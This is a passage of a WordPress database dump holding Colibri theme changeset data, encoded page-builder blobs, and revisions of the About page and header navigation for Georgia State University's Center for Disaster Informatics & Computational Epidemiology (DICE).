HXqW8TTh9mrr77u3CdU6OUyzdcnL46e63Luk0do+eoD2HIsgA3y8dGcC-3wbwHjuQPGVwVA5grQ1lc5HWK0vff6pWa06UAtBI8N1F4khMHr+9ZGxqNomDOG+oQby2e96vwv9E3KE0OMFzFreOrnR+rfPqs5JxhLh4QXuQ7yGe+Z23R+5u32tq8yAjqtQ2ZP9rgus3Isk1Kvm28RgDq9bsdgcyc5voVurjY-nj-U0n0f-ghb87NlmW5+GwwBLM1K77L2B7uXD7nepsnRr2tN-kzc-wO27ynsHKMAAA==\",\n                \"28\": \"base64colibriH4sIAAAAAAACA61YS3OjOBD+LXvoo6aUdmySY4I3tXvb2j3MMSWjBjQjJEoSfvz7PYB42NhjnKnyAfVL-X3dLZAheQfEH94aQITVGyTvgGhERd0asbQ1y60N5AARMAXErFRaOoo+6-crbp6yoNrQmAJi7WztxxsJk5XWtZJcaE+t3STQh7WBnO+DiBDcJIiSc7bJFpLtsnSdPSyGmFndVANCH06axslJ8hkZKUyY5Gybjs8oaON8VzKUY3E41cN+WeODrYYU+2W03gvddOZPnLdWjVGhjwC4HrjpfwsB1yenijIMmLXtdjCN1l2lhSMT-h4qgy8sf+5dlJF0bHVdmmpquh56RrighI6h8GVE9L+Ud9KkCzPha+jaZAvr7exGz+ONLlNeLcxj83pvHrPb4f0MLc7s5UGG8DZDT0vzSB7MY9ioUZPx9-+RpiyQvDhHlP-L7slNNbHhrySwBMqmD1ZREOOkoqXvxwk3G8C0hd8Wo20WTDishzEsQ6WHcV2lUu0BuRRBMDJip0nCagvrFBCDa6h9ihaZ1WrnFMtsVVtDJvS2LT5WCye0Fsd5NzXEbgmPVpkW3ve6WhTUvxG4DydNDDeb-lnbTGjWlYzX1qugrGGOtAhqH1Ne-Qnr1AByQA6r9A-GGDsXjsBfhxZfMvdAwt5qpIgvjXm05fAW4-0zK7TdCc18LTJlCkAuWa7pCMiFVoVhKlDlmS4YGXkmrOSMsJVELpMZLvFeLm8weoeqpfwKBaxwSrLMmiCUITdhZGePNNZdzeyXSdyo-lk5V1dr5uxhkmfRhEDOM2cPTBfs6UxUyQsRnq33c377Oc89w1EtX2ZquVpWy0W83S6kswdA-qPxQeUnllkTyASmC5aRaef5XFfJ67pecdb0PjgKWXnZ+POKQRppzKw+pzuz+pzszOpJmTKrL8vUCmc89wzvo3wR8bfpj1+LPD5OmrQ-Q8pIgGiC7deVnK67RWy0V9Z9VF6023OnWYD2-hl8vjKDIzC5piPbCa-8CPnnpzLxDKmPsWolq4+xWCWrjwwB+Z4pY8hFm7jszOJyPHSvcyw8PnRf7Ibf5DjXUgf2xDkgL9np7FyOLHezOpHtmdCqMIB8KE0XqJ1LTzpvB1m4MJVWck7aih4k84vM3N+r6yu92rVNwmfaZj3bNshLRpoqMl9E-Vuw3z50um+V4ITpYAitR1m-d2x9Dle79RZShLdXQA7J+4mEg2TbLrwKxIyoCJLtN0CeOhKBJCDPrQPkuSMC5I1vv4u+Wyf-ceQ9IBdGfgFeBCkAeRCuoOET8HOnhfnZF7d0lA-4Q6g9rN4APwA-OqiH+ltmq56DtJXCKgX8EC0pg-GUl1UK+CHV-vE+fdT-Ec9lPvda-9rulsW87lw6XveX4rP7mBam6C9LknLR6OFvCXkyolLZxaXw6sXzfy2tfvYMEwAA\",\n                \"122\": \"base64colibriH4sIAAAAAAACA+1bS3PjuBH+LTl0VfZAV6tl2dZxRp5J5pCqrU1Sc5yCyJbYGxBgAJC2-n0OIEVSpmzJ5my8M6rSQXiy+0M30A8Abj8C0e-eGiCC+Qe4-QhERhXclIlyWyapNYFNACKgFRCluejMcTto8fHIOM9pkDg3rYCodLb0-S8pk+bWxZqN0p5jv8FEH9a26j6tQnCDKSTb91Rtz9t7uL0-j1RnH85mL7W6KjrufNhp7pOWsU-ZZMqEAcW2Cuz6FXGer5KFvF8ddmX3vbTywRYdifti27tWumq6LzB2qoyE-QRAiw6a-Y9WQwhnREl63S2YcmzCl4P2eb89iNJth9m5COasMjHbF77X0SMm48fYiOO0L16kzYed5t94E6vp7i5WD9E+EPgngtvrMP8ARF9zC4TKMRA+MMw-D8RwcuZn48zfnM38cgrm-5UzEK7YBHZAuLEOCO-FKx8rvpiNdYUKknogBLpRRQnzj0C4skVZBRXEGqWB8FMpGRditd3ugPCv919Wn34BQhWA8G9s3VYUEP4zqMBA+G8jNTsvYXcC3IEfw2uwpnGsb8-FeolTYA3zVQnzT1dXV0C4dmK2HgiD3XLI2QGhT4VNEB88ECqTAWHpVBokiDXsPBBunC2AMJOanWcgzGyhxMSJgDDjmrUtgTA9WJ+CQ24zq+1W2ANhyFUAwo1KRUuzKI49K5fmQCgGCH+t1lpSIPw7Kx1yoNVQOv4hQbYqnhOrPc2-sS+t8QyEv2pljJjtFRDef1l9AsIH0RoI2ai1ZiAMThmvOzp7NDQkssmVSdkDYWnLSjcfRMdetLBJueU+5AyEKmvBkaJUafBAaDdAmDWUd-Bm4ll59kBYeTFbIMxUUEnmpGYDhKosnVVpzt2YQ2CDtbprDbmz1TYHwoKVEbPdVJHdrdpywSYA4YOEHAhVqjIuJAXC1Gqt1tapYJ2P+rW1NTsTR6yAUExW+eB2faSNNUnp7EYCEJbKBcPt8NhB21TpSHNRGQnC-uoK5iugzyXMP3Wqt7gf32Runxf855T2z3vE0gqICs5E9aco7FqGHByh7OnXxz5FqyFZQLTEkWP+mcP+7s2H-eE+N3txuRdHaJm-QAudfb7dvJoWeoGW2dm0LF6vBlMa0kinG9MJXczpH0jXZ7OXhBrP1vbrn3FzfwFmejvM03pQPYpedqFm52-5N9P4UCoAYWajD0WY2dMcqRMs+3EAjpj2s+uzAbib0Lb-motmIBSTOlaNRRmtUs0169YSdbzt2bsHVmzfTBUfLTtV2Kq1BON8a+WcxE6NnaylkACEKk3Z+8PZgLDomevo2NvKRbNaaW+BULPK2mH7STLxpXISotcQ3YK+FR5dgysg-Jq3jkzGgV0hJvJ-ZKqG6tJxHc1iMZnUklVK9zydODhO5EtOZSMpEOaNQzJgwzogZB+kUKEPvRP-nxZ5fiytr9we7JrTYF2yts7wwCFYxc7sgnju0QOERaWDlFpSCbt23sZ3i9R1Tpl4IHT830ocZ0+dtNZ3aD2dzYbTIDXr3aFrFnL2HLtYF3zPoSqdrSVrIGUgNJyy98rtDuCJzn0DSUdS53uINZ0j43OlNRB6djUDoYpNQCgmsNuolIFwzeGB2fT8tr57NfReT3c7lotX237D-XlkO1mevUHMX03McmpDdEmvB+ZsoxdPMQ+ICg4D26mdxu-PvzhVtKKjXR8dyxjAi5GsGGOJHkhkMwIfrZQoEfGwouUdLLoTPA+F7m-DmdStF59aLWsniWQwv4fFqoNisQIiIEy18n7f6MNOc0J3CITxv7ap0kmLH5bWSxBrEsdaBam5mWj+CRYrA4RACPPVX5IkSQ4rR+hKbVFawyZ0FDTOQkvfs2zQvluvJQbSx-nLO2cE9-+TrbZrpRNfqrSJgCQbzY9AqLRsTSKBC5-obZK2UcJ+fZGN1+8rW1AXY6DSqaA+A+0JTRH7I2AkWydZkloTlBh2A2zW9pH7bUcpe5GIZ8TgcF3nR5fP2YcBodsqBHY+cfYh0dsED6qK7EnVYbkeG1ePjawT7K3mzdhqzs9bzbOQe34pnX0Awt8rH2Sza3NeA5k9bOvL7WHbqEDrbeKD45DmTzVgvKGrbXFMrT7EO7X6EO3U6iflemxcPTayTvA0yM8C-nn4W28Q278DKd3vJ3kLgKqC3ZeLbFhuCq2k3SaN0-hU3q6bpjPYPUMNr4+oYY+djebHZK28+B7v376JafeR8rFdtzwpH9vlypPyMUEgrBMxhl3bpy023dpiX+9uR3F4vd69USAmGjgmVQ-JDCNYu4PNuYV5b4v06upEadkaIOzWppkoqqZnvYm6rFwY1hbZWG2seiWYb0TmDGldHD00mvM9OGUaEYmGfd4FIPbidTcmXotR8SLME9YxpfEmdCbB6Pn9qWH027fhVnKU3wn4mZCr7zBVvniC0p7pp-nw+Qroc75469oAfc6kfr0WvHX8CVp0M4kWLcek6ubH1aIj-P74WnR9XIvew8WKqLfXP4He3h7V2xhgxvin53HvpXc56u3f-om09bup-JQafLn5cvrNl7eiTXi5PHPW5ZlJAH-N-Zs-47b8mpHnjTm39x8elFjOjgcl7r5rUOJugqBEJQkXZdglPqjAB851jFhQL2Kx-0-DiAUNIxb9IvWhGgXpErF4MWLx-wk5vB-tfrnfcz3G247VTp+cWR5NziT0DtMzSxpT0+UlPTOSPcT3n59ZzkdTmHhJ0FwSNFPbQtfHbaHZ7LsaQ7PZH2MNTZe-WV6Pw3Qxhy7m0LtV8MUzCk7fV8FpshzshB7NYhyJiw7-9EnY2XyK-NFy9HLNbP7DJpCOMvyT52FH79T-PMnY2fUbsjqjmf3Z9SWtM31a5-Lo4dRHD1Mmdi7vJk54NzER4D-Q04tLxum9x6T7ZTp45rZ-q6FVfDg4-wBEGW9UpbvXatnOqELSJ0+Kj7-k+B8OMjGHTUgAAA==\"\n            }\n        },\n        \"type\": \"theme_mod\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2024-11-07 17:22:15\"\n    }\n}','','','trash','closed','closed','','dcd7bcb2-c052-4bde-ab44-82656a0709ab','','','2024-11-07 12:22:15','2024-11-07 17:22:15','',0,'https://gsudice.dataconn.net/?p=1836',0,'customize_changeset','',0),(1837,1,'2024-11-07 12:22:15','2024-11-07 17:22:15','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities..<\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c12\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c12\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2024-11-07 12:22:15','2024-11-07 17:22:15','',353,'https://gsudice.dataconn.net/?p=1837',0,'revision','',0),(1838,1,'2024-11-07 12:22:15','2024-11-07 17:22:15','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n            <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c5\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n                      that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n                      partners; and local communities..</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c9 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c10 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c11-outer\">\n            <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c12-outer\">\n            <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c12 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c13\" class=\"h-global-transition-all h-heading style-296 style-local-122-c13 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c13\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c14\" class=\"h-text h-text-component style-298 style-local-122-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2024-11-07 12:22:15','2024-11-07 17:22:15','',122,'https://gsudice.dataconn.net/?p=1838',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1839,1,'2024-11-07 12:22:15','2024-11-07 17:22:15','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"pa